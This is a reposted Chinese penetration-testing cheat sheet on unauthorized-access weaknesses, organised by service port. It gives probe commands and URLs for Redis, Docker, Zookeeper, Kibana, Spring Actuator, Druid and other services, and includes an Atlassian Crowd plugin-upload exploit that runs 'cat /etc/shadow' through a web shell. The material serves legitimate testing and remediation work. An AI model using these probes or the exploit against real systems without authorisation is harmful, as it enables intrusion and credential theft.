

未授权访问漏洞总结
source link: https://827607240.github.io/2020/12/14/ScanUnauthorized/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

未授权访问漏洞总结
[TOC]
ldap—–389
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):
try:
server = Server(ip,get_info=ALL,connect_timeout=1)
conn = Connection(server, auto_bind=True)
print "[+] ldap login for anonymous"
conn.closed
except:
#pass
print '[-] checking for ldap anonymous fail'
工具验证https://www.cnblogs.com/Zh1z3ven/p/13894171.html
http://www.ldapadmin.org/download/ldapadmin.html
RTSP—–554
RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。
漏洞验证
使用nmap扫描开放的端口和服务,初步判断后使用相关的工具的链接测试。
这里以VLC media player为例进行漏洞验证。单击“媒体”选项,选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1
说明:
RTSP地址:rtsp://username:password@ip:port/cam/realmonitor?channel=1&subtype=0
username: 用户名。例如admin。
password: 密码。例如admin。
ip: 为设备IP。例如 192.168.1.1。
port: 端口号默认为554,若为默认可不填写。
channel: 通道号,起始为1。例如通道2,则为channel=2。
subtype: 码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)。
例如,请求某设备的通道2的辅码流,URL如下
rtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1
rsync—–873—-
未授权访问测试
rsync rsync://172.16.2.250:873/
Lotus—–1352
访问/diiop_ior.nsf
nfs—–2049
未授权访问验证
showmount -e ip
Zookeeper—–2181—-
未授权访问测试
#获取该服务器的环境
echo envi|nc 172.16.2.251 2181
Docker—–2375—-
2375是docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。
未授权访问测试
docker -H tcp://192.168.15.5:2375 version
kibana—–5601
未授权访问测试
直接访问kibana的页面,如:
https://10.10.4.89/app/kibana#
http://10.10.4.89:5601/app/kibana#/
并且无需账号密码可以登录进入界面。
VNC—–5900/5901
未授权访问测试
vncviewer 192.168.15.8
CouchDB —–5984—-
未授权访问测试
curl http://192.168.1.1:5984
curl http://192.168.1.1:5984/_config
redis—–6379—-
未授权访问测试
windows
redis-cli.exe -h 192.168.18.138 -p 6379
linux
redis-cli -h 192.168.18.138 -p 6379
Jenkins—–8080—-
未授权访问测试
访问http://192.168.1.1:8080/manage
JBOSS—–8080—-
未授权访问测试
http://192.168.1.1:8080/jmx-console/
spring—–8080
http://**.**.**.**/info
Spring Boot Actuator未授权访问
/dump - 显示线程转储(包括堆栈跟踪)
/autoconfig - 显示自动配置报告
/configprops - 显示配置属性
/trace - 显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown - 关闭应用程序
/info - 显示应用信息
/metrics - 显示当前应用的’指标’信息
/health - 显示应用程序的健康指标
/beans - 显示Spring Beans的完整列表
/mappings - 显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart - 重新启动应用程序
当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了 springboot 框架。
Kubernetes Api Server—–8080
未授权访问测试
端口:8080:http://10.10.4.89:8080/
端口:8080: api dashboard: http://10.10.4.89:8080/ui
端口:10250:端口是kubelet API的HTTPS端口,通过路径/pods获取环境变量、运行的容器信息、命名空间等信息。
Resin—–8080
http://www.example.com:8080/%20../web-inf
远程文件读取
Atlassian Crowd—–8095
未授权访问测试
curl --form "[email protected]" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
访问地址并执行命令:http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
ActiveMQ—–8161
ActiveMQ默认使用8161端口,默认用户名和密码是admin/admin.
浏览器访问
Jupyter Notebook—–8888
SOLR—–8983
http://**.**.**.**/solr/#/
http://**.**.**.**/search.zip
http://**.**.**.**/search/
Elasticsearch—–9200/9300—-
未授权访问测试
curl http://localhost:9200/_nodes #查看节点数据
Memcached—–11211—–
未授权访问测试
telnet 10.0.4.138 11211
stats #查看memcache服务状态
Dubbo—–11211
Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。
漏洞验证
telent IP port
RabbitMQ—–15672
RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。 消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。
未授权访问测试
默认账号密码都是guest
修复建议:
方法一:修改为强密码,删除默认的账号guest
方法二:禁止对外网开放,仅限于内部访问。
Mongodb—–27017—-
nmap -p 27017 --script mongodb-info <target>
Hadoop—–50070—-
未授权访问测试
访问 http://192.168.1.1:8088/cluster
Druid未授权访问
/druid/index.html
/druid/datasource.html
/druid/sql.html
/druid/wall.html
/druid/webapp.html
/druid/weburi.html
/druid/websession.html
/druid/spring.html
/druid/api.html
/system/druid/websession.html
/webpage/system/druid/websession.html(jeecg)
漏洞验证
访问相关的路径:http://10.20.37.152:7001/BSCC/druid/index.html
javaMelody
/monitoring路由
该漏洞修复比较简单,直接更新JavaMelody至1.74.0即可
批量检测脚本
检测部分未授权访问。https://github.com/test502git/Scanunauthorized
检测速度快, 支持批量
, 多线程
, 使用python3编写
把整理好的ip放到当前host.txt文本中,使用Python3运行该项目即可
Recommend
-
138
0 前言 应急响应这一专题,本来并没有打算写。正如公众号的说明所言,比较想分享安全测试、漏洞赏析、渗透技巧、企业安全,其中特别是企业安全建设,这也是当初离职的初衷--到甲方看看安全怎么做?从另一个角度来全新的认识安全,同...
-
72
Redis未授权访问漏洞的重现与利用
-
114
一杯敬故乡,一杯敬远方 最近在研究未授权访问漏洞的检测方式,也写了一部分检测脚本,准确率还挺高。当然光有检测还是不够的,最好能有漏洞利用过程,这样也好证明漏洞的风险性,便于推动漏洞修复也便于自己对漏洞更深入的了解。本文关于漏洞利用以及修复的内...
-
19
新姿势之Docker Remote API未授权访问漏洞分析和利用 黑客,绝...
-
9
利用CouchDB未授权访问漏洞执行任意系统命令 阿里云安全...
-
94
Redis默认配置未配置密码,如果Redis以root用户运行,攻击者可以给root账号写入SSH公钥文件,直接通过SSH免密登录服务器。Redis默认端口为6379端口。若此端口未限制公网访问,会导致Redis服务暴露公网,造成未授权访问。 0x02...
-
52
一、 概述 2019年8月30日,安洵信息星际实验室蜜网捕获到利用Redis未授权访问漏洞的攻击行为。Redis因配置不当可以导致未授权访问,被攻击者恶意利用。 当前流行的针对Redis未授权访问的一种新型攻...
-
18
漏洞复现 攻击机 kali ip:192.168.70.140 靶机 Ubuntu 16.04 ip:192.168.70.133 一、环境搭建 1、下载安装redis wget
-
31
网友:更像是需要钱来运作 杨净 发自 凹非寺 量子位 报道 | 公众号 QbitAI 微软今天宣布,获得OpenAI GPT-3的独家授权。
-
11
本文2020年8月24日发表于代码审计公众号 周日晚,某群里突然发布了一则消息,宝塔面板的phpmyadmin存在未授权访问漏洞的紧急漏洞预警,并给出了一大批存在...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK